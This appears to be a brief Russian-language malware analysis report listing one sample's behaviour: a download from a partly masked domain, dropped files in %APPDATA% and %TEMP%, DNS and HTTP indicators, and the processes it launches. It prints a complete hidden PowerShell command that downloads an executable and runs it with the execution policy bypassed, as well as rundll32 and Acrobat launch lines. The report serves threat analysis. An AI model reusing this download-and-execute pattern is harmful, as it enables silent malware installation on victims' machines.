Техническая информация
- http://ma###msrl.com/kd9.exe как %appdata%\orderf
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\orderf
- %TEMP%\abdtfhghgdghghœ.sct
- 'ma###msrl.com':80
- DNS ASK ma###msrl.com
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'AdobeAcrobat' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma###msrl.com/KD9.exe','%APPDATA%\Orderf');Start-Process '%APPDATA%\Or...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\Orderf
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\Orderf"